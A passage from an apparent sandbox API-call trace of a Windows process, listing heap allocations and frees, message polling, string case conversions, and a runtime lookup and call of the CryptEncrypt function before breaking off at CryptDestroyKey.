(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0204.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0204.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0204.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.448] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0204.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0204.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa968, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.450] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0204.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0204.451] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b18a8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b18a8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0204.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0204.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.452] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.452] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.452] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.452] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.452] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0204.452] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0204.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0204.452] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0204.452] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.452] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0204.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0204.453] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0204.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0204.453] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0204.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0204.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.453] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0204.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0204.454] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0204.454] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.454] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0204.454] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0204.454] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0204.454] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.454] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0204.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0204.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.455] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.455] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.455] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0204.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0204.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.456] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0204.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0204.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0204.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0204.456] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0204.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0204.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0204.456] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0204.456] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0204.457] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0204.457] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0204.457] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0204.457] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.457] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0204.458] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.458] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0204.458] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0204.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0204.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0204.458] CryptDestroyKey 